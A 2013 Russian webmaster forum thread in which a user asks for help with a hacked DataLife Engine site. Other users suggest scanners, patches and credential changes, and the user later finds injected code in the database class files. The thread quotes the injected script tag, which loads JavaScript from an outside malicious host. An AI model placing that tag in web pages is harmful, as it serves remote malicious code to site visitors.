[HELP] Ломают DLE - Форум успешных вебмастеров

jarosek · 10.12.2013, 21:52

Бразы помогите, сабж, ломают сайт один на dle, суют хрень в него и в другие сайты на том же хосте.
шаред хост, логи хранятся только за сегодня, по датам редактирования файлов перерыл все - все чисто.
index.php и файлы шаблонов чистые. но!- вставляется в самом начале страниц такая хрень:

Код:

<nofollow><script language='JavaScript' src=http://37mem4yv28.bestfree.pw/infob.php?i=25659></script></nofollow>

динамика - меняется линк несколько раз в стуки.
я так понял на лету вставляется, вот только откуда - вопрос

хтацесс тоже чист...
чем можно отследить откуда подгружается? или просканить чем?
помогите

спасибо

res1dent · 10.12.2013, 22:10

Ну начну с того что дле гавно )
попробуй софтом айболит
у тебя гдето в файлах перед формирование хтмл (не в индекс пхп точно, там сам вывод в дле формирует другой файл гдето в дата или где там лежат файлы двига - давненько дле не юзал просто ) идет закоженая строка в бэйс64
вот ее надо и убрать
айболит должен найти обфусцированный код...от него и пляши

еще глянь свеже измененные файлы ...ну вдруг =)

Strikelol · 10.12.2013, 22:14

dle-news.ru/bags/v97/1549-patchi-bezopasnosti-dlya-versii-97.html

обнови, закрой админку, сохраняй логи

rusawm · 10.12.2013, 22:15

тачку проверял свою?
смени фтп и не запоминай его в проге

awm521212225 · 10.12.2013, 22:18

аваст вебшел палит, скачай архив с сайтом и просканируй. если дли нуленная, то во всех есть бекдор

Matt Cutts · 10.12.2013, 22:43

Шаредхосты кстати тоже ломают. Были истории. Но у тебя, я предположу, скорее всего, нулл с дыркой на опе)

jarosek · 10.12.2013, 22:47

нулл, да, нашел еще отдельно клоаку кривую по моб трафу, видимо дыр пиздец...
всем спасибо, вручную так и не нашел, ща буду сканить, отпишу

~~BMW~~ · 10.12.2013, 22:49

Все правильно сказали, про сканируй авастом файлы сайта и больше не работай с ДЛЕ особенно нулледом

.

jarosek · 10.12.2013, 22:52

Цитата:

Сообщение от BMW

Все правильно сказали, про сканируй авастом файлы сайта и больше не работай с ДЛЕ особенно нулледом

.

дык не по собственной воле судьба свела

jarosek · 11.12.2013, 01:04

в общем просканил авастом все сайты, что на хосте, понаходил кое что, но совсем не то, и чистка не помогла исправить имеено эту проблему...

чем еще можно просканить?

upd.нашел сцуку!
в mysql.class.php и mysql.php по кусочку разбросано было
Всем Спасибо!